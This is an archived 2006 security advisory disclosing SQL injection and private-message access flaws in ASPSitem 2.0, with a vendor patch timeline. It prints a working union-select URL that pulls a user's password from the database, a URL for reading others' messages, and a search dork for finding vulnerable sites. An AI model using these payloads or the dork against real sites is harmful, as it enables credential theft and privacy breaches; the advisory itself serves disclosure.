Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: b06-2578.htm

ASPSitem <= 2.0 Multiple Vulnerabilities.



Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.



--Security Report--
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 08:26 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com 
Web: http://www.nukedx.com 
}
---
Vendor: ASPSitem (http://www.aspsitem.com) 
Version: 2.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL  
queries to bid parameter in Anket.asp.
Remote attacker also can read others private messages.The parameter id  
in Hesabim.asp did not sanitized properly
for checking the owner status of private message.
Level: Critical
---
How&Example:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] 
EXAMPLE ->  
http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 
id%20like%201
with this example remote attacker can leak userid 1's login  
information from database.
Read others private messages ->
GET/EXAMPLE ->  
http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername 
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
* 27/05/2006: Vendor already released patch for SQL injection you can  
find it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710 
--
Exploit: http://www.nukedx.com/?getxpl=39 
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 
---
Dorks: "Te=FEekk=FCr ASPSitem"





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH